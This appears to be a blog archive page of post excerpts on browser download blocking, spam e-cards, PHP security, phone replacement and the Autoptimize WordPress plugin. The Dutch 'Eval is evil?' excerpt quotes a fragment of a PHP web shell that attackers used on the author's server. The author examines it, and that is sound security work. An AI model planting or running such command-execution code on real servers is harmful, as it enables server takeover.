Firefox3 honouring MSIE security zones, downloads blocked

A few weeks ago my wife complained she couldn’t install software on her WindowsXP-laptop any more. When doubleclicking the downloaded application, she got the errormessage “This is not a valid win32 application”. Earlier today I had the same problem when trying to install Putty, so I tried downloading the file again and noticed the following … Read more

WebApp Security is mandatory (even for spammy virals)

I just received a mail from Frank Goossens. I’ve apparently invited myself to view “an adorable Christmas-card” containing “warm wishes”. Moreover I tried to guilt-trick myself into forwarding that same card to friends and family, as that simple gesture would provide the poor with (unhealthy fried) food for the Poverello Christmas-dinner. In general I don’t … Read more

PHP security: Eval is evil?

Naar aanleiding van mijn vorige post een beetje naar de tooltjes zitten kijken die de script kiddies op mijn serverken loslaten. Een voorbeeldje: <?php echo “549821347819481<br>”; $cmd=”id”; $eseguicmd=ex($cmd); echo $eseguicmd.”<br>”; function ex($cfe){ $res = ”; if (!empty($cfe)){ if(function_exists(‘exec’)){ @exec($cfe,$res); $res = join(“\n”,$res); } elseif(function_exists(‘shell_exec’)){ $res = @shell_exec($cfe); } elseif(function_exists(‘system’)){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); … Read more

Replacing my aging Nokia 6.1 with …

I had been a happy user of the Nokia 6.1 I bought 3 and a half years ago, but with battery life slowly going down and both OS major updates and security-updates having stopped it was time to find a replacement. Although the tech reporters and vloggers were underwhelmed by the screen (no Oled or … Read more

Introducing zytzagoo’s major changes for Autoptimize 2.4

[UPDATE 29/03/2018: Autoptimize 2.4 can now be downloaded from https://github.com/futtta/autoptimize/archive/beta.zip and will automatically update so ensure all new functionality and fixes are applied] TL;DR Autoptimize 2.4 will be a major change. Tomaš Trkulja (aka zytzagoo) has cleaned up and modernized the code significantly, making it easier to read and maintain, switched to the latest and … Read more

Warning WordPress plugin users about their old PHP

After my initial disbelief about the amount of WordPress installations still on the slow and vulnerable PHP 5.2.17 (or older), I decided to warn users of my plugin with an non-dismissable warning on the plugin’s settings-page (and only there, so it’s not a default WordPress admin notice) cluttering the entire backend): This is going in … Read more

Why would you still be on PHP 5.2?

For Autoptimize 2.0.1 I declared a pretty complex regex to extract font-face’s from CSS using the nowdoc-syntax which is supported from PHP 5.3 onwards. Taking into account that the first PHP 5.2 release was over 9 years ago and support ended with the release of 5.2.17, over 5 years ago I assumed using a nowdoc … Read more